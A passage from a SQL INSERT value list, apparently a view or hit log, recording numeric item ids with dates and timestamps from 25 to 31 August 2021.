09:44:53'),(31814,472,1,'2021-08-25','2021-08-25 10:20:51'),(31815,91,1,'2021-08-25','2021-08-25 10:43:26'),(31816,3257,1,'2021-08-25','2021-08-25 10:56:51'),(31817,108,1,'2021-08-25','2021-08-25 11:19:07'),(31818,80,1,'2021-08-25','2021-08-25 11:32:46'),(31819,89,1,'2021-08-25','2021-08-25 11:32:59'),(31820,68,1,'2021-08-25','2021-08-25 11:41:45'),(31821,1602,1,'2021-08-25','2021-08-25 12:02:34'),(31822,1602,1,'2021-08-25','2021-08-25 12:08:16'),(31823,3251,1,'2021-08-25','2021-08-25 12:08:43'),(31824,1602,1,'2021-08-25','2021-08-25 12:09:18'),(31825,1602,1,'2021-08-25','2021-08-25 12:09:33'),(31826,1586,1,'2021-08-25','2021-08-25 12:24:15'),(31827,1606,1,'2021-08-25','2021-08-25 12:47:57'),(31828,1602,1,'2021-08-25','2021-08-25 13:39:20'),(31829,1602,1,'2021-08-25','2021-08-25 13:43:26'),(31830,1608,1,'2021-08-25','2021-08-25 13:43:46'),(31831,1602,1,'2021-08-25','2021-08-25 13:43:57'),(31832,3781,1,'2021-08-25','2021-08-25 14:25:52'),(31833,3781,1,'2021-08-25','2021-08-25 14:32:52'),(31834,3004,1,'2021-08-25','2021-08-25 15:04:45'),(31835,76,1,'2021-08-25','2021-08-25 15:05:57'),(31836,68,1,'2021-08-25','2021-08-25 15:07:33'),(31837,84,1,'2021-08-25','2021-08-25 15:27:16'),(31838,89,1,'2021-08-25','2021-08-25 15:28:06'),(31839,3781,1,'2021-08-25','2021-08-25 16:33:15'),(31840,1774,1,'2021-08-25','2021-08-25 17:30:30'),(31841,68,1,'2021-08-25','2021-08-25 18:14:58'),(31842,2813,1,'2021-08-25','2021-08-25 20:13:21'),(31843,3117,1,'2021-08-25','2021-08-25 20:18:44'),(31844,1598,1,'2021-08-25','2021-08-25 20:22:29'),(31845,89,1,'2021-08-25','2021-08-25 20:26:55'),(31846,472,1,'2021-08-25','2021-08-25 20:38:49'),(31847,1600,1,'2021-08-25','2021-08-25 20:48:43'),(31848,2804,1,'2021-08-25','2021-08-25 20:52:10'),(31849,1584,1,'2021-08-25','2021-08-25 20:58:43'),(31850,1584,1,'2021-08-25','2021-08-25 21:02:20'),(31851,3240,1,'2021-08-25','2021-08-25 21:18:55'),(31852,472,1,'2021-08-25','2021-08-25 21:18:56'),(31853,2309,1,'2021-08-25','2021-08-25 21:38:50'),(31854,1739,1,'2021-08-25','2021-08-25 21:50:28'),(31855,2309,1,'2021-08-25','2021-08-25 22:01:02'),(31856,3117,1,'2021-08-25','2021-08-25 22:18:42'),(31857,3117,1,'2021-08-25','2021-08-25 22:18:48'),(31858,1872,1,'2021-08-25','2021-08-25 22:18:49'),(31859,80,1,'2021-08-25','2021-08-25 22:56:34'),(31860,1877,1,'2021-08-25','2021-08-25 22:58:48'),(31861,80,1,'2021-08-25','2021-08-25 23:18:46'),(31862,3045,1,'2021-08-25','2021-08-25 23:18:51'),(31863,2971,1,'2021-08-25','2021-08-25 23:38:50'),(31864,3257,1,'2021-08-26','2021-08-26 00:18:42'),(31865,1872,1,'2021-08-26','2021-08-26 00:19:00'),(31866,469,1,'2021-08-26','2021-08-26 00:43:18'),(31867,2775,1,'2021-08-26','2021-08-26 00:48:52'),(31868,1606,1,'2021-08-26','2021-08-26 01:18:03'),(31869,473,1,'2021-08-26','2021-08-26 01:18:53'),(31870,3257,1,'2021-08-26','2021-08-26 01:28:52'),(31871,3240,1,'2021-08-26','2021-08-26 01:45:26'),(31872,3251,1,'2021-08-26','2021-08-26 01:48:52'),(31873,1584,1,'2021-08-26','2021-08-26 01:58:53'),(31874,2457,1,'2021-08-26','2021-08-26 02:08:52'),(31875,2457,1,'2021-08-26','2021-08-26 02:18:53'),(31876,1606,1,'2021-08-26','2021-08-26 03:02:13'),(31877,1582,1,'2021-08-26','2021-08-26 03:46:19'),(31878,2410,1,'2021-08-26','2021-08-26 04:19:06'),(31879,80,1,'2021-08-26','2021-08-26 04:51:09'),(31880,80,1,'2021-08-26','2021-08-26 04:52:23'),(31881,1606,1,'2021-08-26','2021-08-26 05:48:15'),(31882,1600,1,'2021-08-26','2021-08-26 05:54:57'),(31883,3045,1,'2021-08-26','2021-08-26 07:15:29'),(31884,3280,1,'2021-08-26','2021-08-26 07:49:35'),(31885,2165,1,'2021-08-26','2021-08-26 07:50:34'),(31886,2165,1,'2021-08-26','2021-08-26 07:50:41'),(31887,2813,1,'2021-08-26','2021-08-26 07:59:17'),(31888,2165,1,'2021-08-26','2021-08-26 08:32:19'),(31889,2165,1,'2021-08-26','2021-08-26 08:32:59'),(31890,2165,1,'2021-08-26','2021-08-26 08:33:05'),(31891,1586,1,'2021-08-26','2021-08-26 09:11:23'),(31892,1739,1,'2021-08-26','2021-08-26 09:45:11'),(31893,1602,1,'2021-08-26','2021-08-26 09:53:15'),(31894,2309,1,'2021-08-26','2021-08-26 09:55:00'),(31895,2309,1,'2021-08-26','2021-08-26 10:10:31'),(31896,2309,1,'2021-08-26','2021-08-26 10:18:42'),(31897,80,1,'2021-08-26','2021-08-26 10:56:16'),(31898,3109,1,'2021-08-26','2021-08-26 11:03:33'),(31899,2704,1,'2021-08-26','2021-08-26 11:40:15'),(31900,89,1,'2021-08-26','2021-08-26 11:52:45'),(31901,473,1,'2021-08-26','2021-08-26 11:54:56'),(31902,472,1,'2021-08-26','2021-08-26 11:55:35'),(31903,473,1,'2021-08-26','2021-08-26 11:55:47'),(31904,474,1,'2021-08-26','2021-08-26 11:55:54'),(31905,91,1,'2021-08-26','2021-08-26 11:56:17'),(31906,2609,1,'2021-08-26','2021-08-26 11:57:34'),(31907,2609,1,'2021-08-26','2021-08-26 11:58:00'),(31908,2609,1,'2021-08-26','2021-08-26 11:58:43'),(31909,3313,1,'2021-08-26','2021-08-26 12:06:31'),(31910,3083,1,'2021-08-26','2021-08-26 13:01:56'),(31911,2775,1,'2021-08-26','2021-08-26 13:34:47'),(31912,1594,1,'2021-08-26','2021-08-26 13:50:53'),(31913,2971,1,'2021-08-26','2021-08-26 14:07:18'),(31914,2297,1,'2021-08-26','2021-08-26 14:31:34'),(31915,472,1,'2021-08-26','2021-08-26 15:21:26'),(31916,91,1,'2021-08-26','2021-08-26 15:30:44'),(31917,2410,1,'2021-08-26','2021-08-26 15:37:23'),(31918,3069,1,'2021-08-26','2021-08-26 15:47:33'),(31919,1602,1,'2021-08-26','2021-08-26 15:52:53'),(31920,1598,1,'2021-08-26','2021-08-26 15:57:46'),(31921,2904,1,'2021-08-26','2021-08-26 17:35:19'),(31922,469,1,'2021-08-26','2021-08-26 18:12:58'),(31923,91,1,'2021-08-26','2021-08-26 19:52:53'),(31924,3030,1,'2021-08-26','2021-08-26 20:21:41'),(31925,89,1,'2021-08-26','2021-08-26 20:46:32'),(31926,3083,1,'2021-08-26','2021-08-26 21:05:30'),(31927,2309,1,'2021-08-26','2021-08-26 21:09:37'),(31928,3541,1,'2021-08-26','2021-08-26 21:16:25'),(31929,2309,1,'2021-08-26','2021-08-26 21:18:42'),(31930,2457,1,'2021-08-26','2021-08-26 21:31:28'),(31931,2704,1,'2021-08-26','2021-08-26 21:56:50'),(31932,467,1,'2021-08-26','2021-08-26 22:41:52'),(31933,1709,1,'2021-08-26','2021-08-26 22:41:53'),(31934,1594,1,'2021-08-26','2021-08-26 22:45:22'),(31935,2769,1,'2021-08-26','2021-08-26 22:50:55'),(31936,467,1,'2021-08-27','2021-08-27 00:05:21'),(31937,467,1,'2021-08-27','2021-08-27 00:15:38'),(31938,2704,1,'2021-08-27','2021-08-27 00:18:05'),(31939,102,1,'2021-08-27','2021-08-27 01:53:01'),(31940,3251,1,'2021-08-27','2021-08-27 02:37:38'),(31941,1606,1,'2021-08-27','2021-08-27 03:07:43'),(31942,3107,1,'2021-08-27','2021-08-27 03:11:30'),(31943,1602,1,'2021-08-27','2021-08-27 03:59:52'),(31944,108,1,'2021-08-27','2021-08-27 04:21:44'),(31945,472,1,'2021-08-27','2021-08-27 04:49:28'),(31946,89,1,'2021-08-27','2021-08-27 05:20:01'),(31947,2309,1,'2021-08-27','2021-08-27 07:20:33'),(31948,108,1,'2021-08-27','2021-08-27 08:42:46'),(31949,1602,1,'2021-08-27','2021-08-27 09:11:55'),(31950,1770,1,'2021-08-27','2021-08-27 09:13:03'),(31951,2309,1,'2021-08-27','2021-08-27 09:45:53'),(31952,1774,1,'2021-08-27','2021-08-27 09:46:22'),(31953,1602,1,'2021-08-27','2021-08-27 10:30:20'),(31954,3005,1,'2021-08-27','2021-08-27 10:40:01'),(31955,3781,1,'2021-08-27','2021-08-27 11:26:36'),(31956,3175,1,'2021-08-27','2021-08-27 12:17:49'),(31957,3746,1,'2021-08-27','2021-08-27 12:44:12'),(31958,89,1,'2021-08-27','2021-08-27 13:11:57'),(31959,1709,1,'2021-08-27','2021-08-27 13:44:33'),(31960,2457,1,'2021-08-27','2021-08-27 13:54:41'),(31961,80,1,'2021-08-27','2021-08-27 14:11:22'),(31962,1877,1,'2021-08-27','2021-08-27 14:13:31'),(31963,3282,1,'2021-08-27','2021-08-27 15:44:37'),(31964,3307,1,'2021-08-27','2021-08-27 15:46:56'),(31965,3107,1,'2021-08-27','2021-08-27 15:59:12'),(31966,1582,1,'2021-08-27','2021-08-27 16:25:04'),(31967,472,1,'2021-08-27','2021-08-27 17:07:52'),(31968,1606,1,'2021-08-27','2021-08-27 17:31:48'),(31969,80,1,'2021-08-27','2021-08-27 17:32:23'),(31970,1586,1,'2021-08-27','2021-08-27 18:32:51'),(31971,467,1,'2021-08-27','2021-08-27 18:48:08'),(31972,1602,1,'2021-08-27','2021-08-27 19:08:40'),(31973,3307,1,'2021-08-27','2021-08-27 19:43:46'),(31974,1602,1,'2021-08-27','2021-08-27 20:17:19'),(31975,2813,1,'2021-08-27','2021-08-27 20:56:06'),(31976,1718,1,'2021-08-27','2021-08-27 21:10:52'),(31977,1582,1,'2021-08-27','2021-08-27 21:15:37'),(31978,472,1,'2021-08-27','2021-08-27 21:30:06'),(31979,3285,1,'2021-08-27','2021-08-27 22:02:02'),(31980,3072,1,'2021-08-27','2021-08-27 23:04:49'),(31981,1594,1,'2021-08-27','2021-08-27 23:29:30'),(31982,2769,1,'2021-08-27','2021-08-27 23:31:40'),(31983,3710,1,'2021-08-27','2021-08-27 23:49:36'),(31984,2609,1,'2021-08-27','2021-08-27 23:52:00'),(31985,89,1,'2021-08-28','2021-08-28 00:06:06'),(31986,2457,1,'2021-08-28','2021-08-28 00:12:59'),(31987,3030,1,'2021-08-28','2021-08-28 00:50:13'),(31988,1600,1,'2021-08-28','2021-08-28 00:50:34'),(31989,2813,1,'2021-08-28','2021-08-28 01:19:47'),(31990,1872,1,'2021-08-28','2021-08-28 01:52:33'),(31991,3746,1,'2021-08-28','2021-08-28 02:18:31'),(31992,469,1,'2021-08-28','2021-08-28 03:44:24'),(31993,3774,1,'2021-08-28','2021-08-28 03:49:11'),(31994,89,1,'2021-08-28','2021-08-28 04:13:30'),(31995,1770,1,'2021-08-28','2021-08-28 04:20:04'),(31996,1774,1,'2021-08-28','2021-08-28 04:20:04'),(31997,3109,1,'2021-08-28','2021-08-28 04:27:43'),(31998,1602,1,'2021-08-28','2021-08-28 05:11:00'),(31999,1594,1,'2021-08-28','2021-08-28 05:28:34'),(32000,1582,1,'2021-08-28','2021-08-28 05:42:02'),(32001,2609,1,'2021-08-28','2021-08-28 05:46:02'),(32002,570,1,'2021-08-28','2021-08-28 06:03:35'),(32003,2911,1,'2021-08-28','2021-08-28 06:23:06'),(32004,570,1,'2021-08-28','2021-08-28 06:23:23'),(32005,479,1,'2021-08-28','2021-08-28 07:47:13'),(32006,1614,1,'2021-08-28','2021-08-28 07:55:51'),(32007,2813,1,'2021-08-28','2021-08-28 08:26:08'),(32008,2309,1,'2021-08-28','2021-08-28 08:27:41'),(32009,3691,1,'2021-08-28','2021-08-28 08:34:06'),(32010,1614,1,'2021-08-28','2021-08-28 08:51:57'),(32011,80,1,'2021-08-28','2021-08-28 09:00:17'),(32012,3069,1,'2021-08-28','2021-08-28 09:02:48'),(32013,1608,1,'2021-08-28','2021-08-28 09:08:09'),(32014,2704,1,'2021-08-28','2021-08-28 09:49:21'),(32015,1584,1,'2021-08-28','2021-08-28 10:38:26'),(32016,3030,1,'2021-08-28','2021-08-28 10:49:07'),(32017,2751,1,'2021-08-28','2021-08-28 10:50:46'),(32018,2813,1,'2021-08-28','2021-08-28 10:58:00'),(32019,469,1,'2021-08-28','2021-08-28 11:07:16'),(32020,3051,1,'2021-08-28','2021-08-28 11:47:10'),(32021,76,1,'2021-08-28','2021-08-28 11:58:19'),(32022,1608,1,'2021-08-28','2021-08-28 12:08:14'),(32023,3691,1,'2021-08-28','2021-08-28 12:18:17'),(32024,1594,1,'2021-08-28','2021-08-28 12:38:38'),(32025,2309,1,'2021-08-28','2021-08-28 13:38:15'),(32026,3253,1,'2021-08-28','2021-08-28 13:58:51'),(32027,3781,1,'2021-08-28','2021-08-28 14:08:47'),(32028,3253,1,'2021-08-28','2021-08-28 14:49:18'),(32029,1614,1,'2021-08-28','2021-08-28 14:58:53'),(32030,3051,1,'2021-08-28','2021-08-28 15:07:02'),(32031,1870,1,'2021-08-28','2021-08-28 16:01:24'),(32032,72,1,'2021-08-28','2021-08-28 16:06:25'),(32033,2911,1,'2021-08-28','2021-08-28 16:20:03'),(32034,3087,1,'2021-08-28','2021-08-28 16:36:23'),(32035,2769,1,'2021-08-28','2021-08-28 16:41:45'),(32036,469,1,'2021-08-28','2021-08-28 16:52:50'),(32037,2704,1,'2021-08-28','2021-08-28 18:32:14'),(32038,3691,1,'2021-08-28','2021-08-28 18:44:04'),(32039,2775,1,'2021-08-28','2021-08-28 18:49:03'),(32040,1614,1,'2021-08-28','2021-08-28 18:55:53'),(32041,1592,1,'2021-08-28','2021-08-28 19:01:09'),(32042,1604,1,'2021-08-28','2021-08-28 19:10:26'),(32043,476,1,'2021-08-28','2021-08-28 19:19:52'),(32044,1592,1,'2021-08-28','2021-08-28 19:31:01'),(32045,483,1,'2021-08-28','2021-08-28 19:40:49'),(32046,2309,1,'2021-08-28','2021-08-28 19:55:00'),(32047,1594,1,'2021-08-28','2021-08-28 20:43:15'),(32048,2813,1,'2021-08-28','2021-08-28 20:51:23'),(32049,469,1,'2021-08-28','2021-08-28 20:55:20'),(32050,2904,1,'2021-08-28','2021-08-28 20:58:49'),(32051,2904,1,'2021-08-28','2021-08-28 20:59:12'),(32052,469,1,'2021-08-28','2021-08-28 20:59:46'),(32053,2309,1,'2021-08-28','2021-08-28 21:12:25'),(32054,1582,1,'2021-08-28','2021-08-28 21:20:40'),(32055,1584,1,'2021-08-28','2021-08-28 21:41:54'),(32056,479,1,'2021-08-28','2021-08-28 21:50:39'),(32057,479,1,'2021-08-28','2021-08-28 21:51:37'),(32058,1728,1,'2021-08-28','2021-08-28 21:55:06'),(32059,3030,1,'2021-08-28','2021-08-28 22:01:38'),(32060,1877,1,'2021-08-28','2021-08-28 22:25:05'),(32061,3243,1,'2021-08-28','2021-08-28 23:22:25'),(32062,76,1,'2021-08-28','2021-08-28 23:40:24'),(32063,2704,1,'2021-08-29','2021-08-29 00:41:55'),(32064,2956,1,'2021-08-29','2021-08-29 01:22:43'),(32065,3030,1,'2021-08-29','2021-08-29 01:32:51'),(32066,2309,1,'2021-08-29','2021-08-29 01:39:59'),(32067,1602,1,'2021-08-29','2021-08-29 02:32:02'),(32068,1602,1,'2021-08-29','2021-08-29 02:32:27'),(32069,2769,1,'2021-08-29','2021-08-29 02:33:22'),(32070,1608,1,'2021-08-29','2021-08-29 02:34:01'),(32071,3058,1,'2021-08-29','2021-08-29 02:55:21'),(32072,2911,1,'2021-08-29','2021-08-29 02:55:23'),(32073,3430,1,'2021-08-29','2021-08-29 03:03:02'),(32074,3051,1,'2021-08-29','2021-08-29 03:11:34'),(32075,2309,1,'2021-08-29','2021-08-29 04:45:32'),(32076,89,1,'2021-08-29','2021-08-29 04:58:43'),(32077,1582,1,'2021-08-29','2021-08-29 05:15:00'),(32078,1600,1,'2021-08-29','2021-08-29 05:16:45'),(32079,84,1,'2021-08-29','2021-08-29 05:23:34'),(32080,2775,1,'2021-08-29','2021-08-29 05:40:36'),(32081,1608,1,'2021-08-29','2021-08-29 05:45:16'),(32082,2813,1,'2021-08-29','2021-08-29 06:03:36'),(32083,1594,1,'2021-08-29','2021-08-29 06:10:15'),(32084,1608,1,'2021-08-29','2021-08-29 06:14:59'),(32085,1600,1,'2021-08-29','2021-08-29 06:15:04'),(32086,2704,1,'2021-08-29','2021-08-29 06:40:03'),(32087,486,1,'2021-08-29','2021-08-29 07:02:49'),(32088,3282,1,'2021-08-29','2021-08-29 07:45:42'),(32089,3030,1,'2021-08-29','2021-08-29 08:08:02'),(32090,469,1,'2021-08-29','2021-08-29 08:10:03'),(32091,1600,1,'2021-08-29','2021-08-29 08:15:01'),(32092,3058,1,'2021-08-29','2021-08-29 08:26:33'),(32093,72,1,'2021-08-29','2021-08-29 08:38:15'),(32094,1604,1,'2021-08-29','2021-08-29 08:44:46'),(32095,1604,1,'2021-08-29','2021-08-29 08:50:08'),(32096,1870,1,'2021-08-29','2021-08-29 08:56:36'),(32097,72,1,'2021-08-29','2021-08-29 08:58:54'),(32098,3045,1,'2021-08-29','2021-08-29 09:15:28'),(32099,485,1,'2021-08-29','2021-08-29 09:26:44'),(32100,3313,1,'2021-08-29','2021-08-29 09:26:48'),(32101,1598,1,'2021-08-29','2021-08-29 09:36:48'),(32102,84,1,'2021-08-29','2021-08-29 09:44:26'),(32103,1596,1,'2021-08-29','2021-08-29 09:56:36'),(32104,3251,1,'2021-08-29','2021-08-29 10:10:00'),(32105,3030,1,'2021-08-29','2021-08-29 10:16:26'),(32106,2609,1,'2021-08-29','2021-08-29 10:30:36'),(32107,1877,1,'2021-08-29','2021-08-29 10:33:19'),(32108,1713,1,'2021-08-29','2021-08-29 10:35:49'),(32109,1713,1,'2021-08-29','2021-08-29 10:36:02'),(32110,1778,1,'2021-08-29','2021-08-29 10:44:08'),(32111,1602,1,'2021-08-29','2021-08-29 11:10:28'),(32112,3127,1,'2021-08-29','2021-08-29 11:30:25'),(32113,2769,1,'2021-08-29','2021-08-29 12:27:21'),(32114,471,1,'2021-08-29','2021-08-29 12:28:43'),(32115,3069,1,'2021-08-29','2021-08-29 12:59:09'),(32116,89,1,'2021-08-29','2021-08-29 13:06:31'),(32117,1614,1,'2021-08-29','2021-08-29 14:15:36'),(32118,1614,1,'2021-08-29','2021-08-29 14:19:16'),(32119,1602,1,'2021-08-29','2021-08-29 14:25:27'),(32120,2309,1,'2021-08-29','2021-08-29 14:46:52'),(32121,1594,1,'2021-08-29','2021-08-29 14:54:11'),(32122,2989,1,'2021-08-29','2021-08-29 15:19:40'),(32123,1586,1,'2021-08-29','2021-08-29 15:24:11'),(32124,2813,1,'2021-08-29','2021-08-29 15:42:20'),(32125,469,1,'2021-08-29','2021-08-29 15:46:48'),(32126,3290,1,'2021-08-29','2021-08-29 16:08:55'),(32127,2457,1,'2021-08-29','2021-08-29 16:16:24'),(32128,472,1,'2021-08-29','2021-08-29 16:25:04'),(32129,72,1,'2021-08-29','2021-08-29 16:31:15'),(32130,1582,1,'2021-08-29','2021-08-29 16:40:15'),(32131,2704,1,'2021-08-29','2021-08-29 16:43:09'),(32132,1604,1,'2021-08-29','2021-08-29 16:54:59'),(32133,3290,1,'2021-08-29','2021-08-29 16:55:10'),(32134,1592,1,'2021-08-29','2021-08-29 16:57:20'),(32135,477,1,'2021-08-29','2021-08-29 17:12:00'),(32136,474,1,'2021-08-29','2021-08-29 17:19:33'),(32137,468,1,'2021-08-29','2021-08-29 17:30:02'),(32138,1586,1,'2021-08-29','2021-08-29 17:33:19'),(32139,2965,1,'2021-08-29','2021-08-29 17:40:49'),(32140,1582,1,'2021-08-29','2021-08-29 17:47:44'),(32141,2410,1,'2021-08-29','2021-08-29 18:13:28'),(32142,1596,1,'2021-08-29','2021-08-29 18:26:42'),(32143,2457,1,'2021-08-29','2021-08-29 18:47:49'),(32144,3251,1,'2021-08-29','2021-08-29 18:55:04'),(32145,2993,1,'2021-08-29','2021-08-29 19:08:31'),(32146,2609,1,'2021-08-29','2021-08-29 20:33:26'),(32147,2609,1,'2021-08-29','2021-08-29 20:33:37'),(32148,2609,1,'2021-08-29','2021-08-29 20:34:20'),(32149,2609,1,'2021-08-29','2021-08-29 20:58:23'),(32150,474,1,'2021-08-29','2021-08-29 21:00:54'),(32151,2609,1,'2021-08-29','2021-08-29 21:01:27'),(32152,3060,1,'2021-08-29','2021-08-29 21:01:28'),(32153,2609,1,'2021-08-29','2021-08-29 21:03:30'),(32154,2609,1,'2021-08-29','2021-08-29 21:03:50'),(32155,72,1,'2021-08-29','2021-08-29 21:05:16'),(32156,3781,1,'2021-08-29','2021-08-29 21:06:50'),(32157,1872,1,'2021-08-29','2021-08-29 21:08:39'),(32158,1872,1,'2021-08-29','2021-08-29 21:08:57'),(32159,470,1,'2021-08-29','2021-08-29 21:14:58'),(32160,80,1,'2021-08-29','2021-08-29 21:34:19'),(32161,2911,1,'2021-08-29','2021-08-29 21:44:09'),(32162,1778,1,'2021-08-29','2021-08-29 22:04:15'),(32163,468,1,'2021-08-29','2021-08-29 22:04:16'),(32164,2769,1,'2021-08-29','2021-08-29 22:17:41'),(32165,3030,1,'2021-08-29','2021-08-29 22:25:00'),(32166,2956,1,'2021-08-29','2021-08-29 22:37:09'),(32167,72,1,'2021-08-29','2021-08-29 22:39:53'),(32168,3251,1,'2021-08-29','2021-08-29 22:47:39'),(32169,72,1,'2021-08-29','2021-08-29 22:59:27'),(32170,2309,1,'2021-08-29','2021-08-29 23:04:46'),(32171,1778,1,'2021-08-29','2021-08-29 23:04:47'),(32172,1776,1,'2021-08-30','2021-08-30 00:04:11'),(32173,3781,1,'2021-08-30','2021-08-30 00:11:34'),(32174,472,1,'2021-08-30','2021-08-30 00:13:33'),(32175,3023,1,'2021-08-30','2021-08-30 00:50:27'),(32176,3023,1,'2021-08-30','2021-08-30 00:52:33'),(32177,2704,1,'2021-08-30','2021-08-30 01:48:28'),(32178,3127,1,'2021-08-30','2021-08-30 02:23:06'),(32179,1718,1,'2021-08-30','2021-08-30 03:20:18'),(32180,469,1,'2021-08-30','2021-08-30 03:25:10'),(32181,1870,1,'2021-08-30','2021-08-30 04:18:46'),(32182,1602,1,'2021-08-30','2021-08-30 04:50:06'),(32183,488,1,'2021-08-30','2021-08-30 04:51:43'),(32184,478,1,'2021-08-30','2021-08-30 04:55:42'),(32185,1586,1,'2021-08-30','2021-08-30 05:00:34'),(32186,89,1,'2021-08-30','2021-08-30 05:09:07'),(32187,1766,1,'2021-08-30','2021-08-30 05:10:47'),(32188,1586,1,'2021-08-30','2021-08-30 05:33:24'),(32189,1612,1,'2021-08-30','2021-08-30 05:56:57'),(32190,478,1,'2021-08-30','2021-08-30 06:03:37'),(32191,3777,1,'2021-08-30','2021-08-30 06:43:23'),(32192,2309,1,'2021-08-30','2021-08-30 06:45:24'),(32193,1586,1,'2021-08-30','2021-08-30 07:12:07'),(32194,1582,1,'2021-08-30','2021-08-30 07:15:47'),(32195,469,1,'2021-08-30','2021-08-30 07:45:07'),(32196,1602,1,'2021-08-30','2021-08-30 07:47:35'),(32197,2965,1,'2021-08-30','2021-08-30 07:58:24'),(32198,1734,1,'2021-08-30','2021-08-30 08:23:31'),(32199,3710,1,'2021-08-30','2021-08-30 08:28:45'),(32200,1594,1,'2021-08-30','2021-08-30 08:45:02'),(32201,2989,1,'2021-08-30','2021-08-30 08:45:56'),(32202,3127,1,'2021-08-30','2021-08-30 09:00:05'),(32203,1778,1,'2021-08-30','2021-08-30 09:07:08'),(32204,3127,1,'2021-08-30','2021-08-30 09:13:37'),(32205,3251,1,'2021-08-30','2021-08-30 09:15:14'),(32206,1602,1,'2021-08-30','2021-08-30 09:21:31'),(32207,1778,1,'2021-08-30','2021-08-30 09:37:39'),(32208,1697,1,'2021-08-30','2021-08-30 09:45:11'),(32209,1766,1,'2021-08-30','2021-08-30 10:15:36'),(32210,2769,1,'2021-08-30','2021-08-30 10:18:22'),(32211,89,1,'2021-08-30','2021-08-30 12:25:55'),(32212,1602,1,'2021-08-30','2021-08-30 12:27:42'),(32213,1718,1,'2021-08-30','2021-08-30 12:51:42'),(32214,488,1,'2021-08-30','2021-08-30 13:01:36'),(32215,1596,1,'2021-08-30','2021-08-30 13:10:22'),(32216,80,1,'2021-08-30','2021-08-30 13:13:15'),(32217,1596,1,'2021-08-30','2021-08-30 13:15:49'),(32218,1598,1,'2021-08-30','2021-08-30 13:22:41'),(32219,72,1,'2021-08-30','2021-08-30 13:39:12'),(32220,335,1,'2021-08-30','2021-08-30 13:40:08'),(32221,3087,1,'2021-08-30','2021-08-30 13:47:16'),(32222,3087,1,'2021-08-30','2021-08-30 13:47:31'),(32223,3109,1,'2021-08-30','2021-08-30 13:56:56'),(32224,3087,1,'2021-08-30','2021-08-30 14:00:33'),(32225,91,1,'2021-08-30','2021-08-30 14:03:24'),(32226,1614,1,'2021-08-30','2021-08-30 14:10:45'),(32227,3710,1,'2021-08-30','2021-08-30 14:11:46'),(32228,1608,1,'2021-08-30','2021-08-30 14:46:19'),(32229,2813,1,'2021-08-30','2021-08-30 14:55:19'),(32230,2159,1,'2021-08-30','2021-08-30 14:58:18'),(32231,2159,1,'2021-08-30','2021-08-30 14:58:23'),(32232,2159,1,'2021-08-30','2021-08-30 14:58:42'),(32233,1877,1,'2021-08-30','2021-08-30 15:11:35'),(32234,1602,1,'2021-08-30','2021-08-30 15:51:17'),(32235,2503,1,'2021-08-30','2021-08-30 16:44:20'),(32236,469,1,'2021-08-30','2021-08-30 17:58:04'),(32237,1602,1,'2021-08-30','2021-08-30 18:09:26'),(32238,1602,1,'2021-08-30','2021-08-30 18:12:04'),(32239,80,1,'2021-08-30','2021-08-30 18:12:40'),(32240,1586,1,'2021-08-30','2021-08-30 18:28:45'),(32241,1600,1,'2021-08-30','2021-08-30 18:39:45'),(32242,1600,1,'2021-08-30','2021-08-30 18:40:42'),(32243,1602,1,'2021-08-30','2021-08-30 18:52:50'),(32244,80,1,'2021-08-30','2021-08-30 18:56:27'),(32245,80,1,'2021-08-30','2021-08-30 18:57:18'),(32246,1582,1,'2021-08-30','2021-08-30 19:06:42'),(32247,1582,1,'2021-08-30','2021-08-30 19:11:29'),(32248,2178,1,'2021-08-30','2021-08-30 19:13:23'),(32249,3781,1,'2021-08-30','2021-08-30 19:17:19'),(32250,2457,1,'2021-08-30','2021-08-30 19:24:02'),(32251,472,1,'2021-08-30','2021-08-30 19:30:37'),(32252,1612,1,'2021-08-30','2021-08-30 19:32:34'),(32253,2248,1,'2021-08-30','2021-08-30 19:39:38'),(32254,1877,1,'2021-08-30','2021-08-30 19:42:13'),(32255,3023,1,'2021-08-30','2021-08-30 19:47:51'),(32256,2248,1,'2021-08-30','2021-08-30 19:48:07'),(32257,2248,1,'2021-08-30','2021-08-30 19:48:42'),(32258,2965,1,'2021-08-30','2021-08-30 19:52:23'),(32259,469,1,'2021-08-30','2021-08-30 19:54:48'),(32260,1697,1,'2021-08-30','2021-08-30 20:12:43'),(32261,76,1,'2021-08-30','2021-08-30 20:19:20'),(32262,89,1,'2021-08-30','2021-08-30 20:26:18'),(32263,3746,1,'2021-08-30','2021-08-30 20:34:06'),(32264,3710,1,'2021-08-30','2021-08-30 20:39:32'),(32265,2991,1,'2021-08-30','2021-08-30 20:48:52'),(32266,2309,1,'2021-08-30','2021-08-30 20:56:25'),(32267,3251,1,'2021-08-30','2021-08-30 21:04:58'),(32268,1586,1,'2021-08-30','2021-08-30 21:05:51'),(32269,474,1,'2021-08-30','2021-08-30 21:12:16'),(32270,2971,1,'2021-08-30','2021-08-30 21:12:41'),(32271,2965,1,'2021-08-30','2021-08-30 21:19:04'),(32272,2704,1,'2021-08-30','2021-08-30 21:25:39'),(32273,2769,1,'2021-08-30','2021-08-30 21:28:32'),(32274,2769,1,'2021-08-30','2021-08-30 21:29:22'),(32275,2159,1,'2021-08-30','2021-08-30 21:29:42'),(32276,91,1,'2021-08-30','2021-08-30 21:39:35'),(32277,87,1,'2021-08-30','2021-08-30 22:00:30'),(32278,84,1,'2021-08-30','2021-08-30 22:02:33'),(32279,80,1,'2021-08-30','2021-08-30 22:08:02'),(32280,72,1,'2021-08-30','2021-08-30 22:10:42'),(32281,108,1,'2021-08-30','2021-08-30 22:11:21'),(32282,3030,1,'2021-08-30','2021-08-30 23:28:21'),(32283,1606,1,'2021-08-31','2021-08-31 01:46:59'),(32284,1774,1,'2021-08-31','2021-08-31 01:51:44'),(32285,3746,1,'2021-08-31','2021-08-31 01:59:59'),(32286,1602,1,'2021-08-31','2021-08-31 02:29:58'),(32287,2178,1,'2021-08-31','2021-08-31 04:31:25'),(32288,1588,1,'2021-08-31','2021-08-31 05:00:00'),(32289,1600,1,'2021-08-31','2021-08-31 05:18:37'),(32290,1586,1,'2021-08-31','2021-08-31 05:19:47'),(32291,87,1,'2021-08-31','2021-08-31 05:20:37'),(32292,89,1,'2021-08-31','2021-08-31 05:21:42'),(32293,76,1,'2021-08-31','2021-08-31 05:22:49'),(32294,80,1,'2021-08-31','2021-08-31 05:24:49'),(32295,91,1,'2021-08-31','2021-08-31 05:26:48'),(32296,1600,1,'2021-08-31','2021-08-31 05:27:50'),(32297,80,1,'2021-08-31','2021-08-31 05:28:28'),(32298,2503,1,'2021-08-31','2021-08-31 05:33:02'),(32299,84,1,'2021-08-31','2021-08-31 05:33:38'),(32300,1600,1,'2021-08-31','2021-08-31 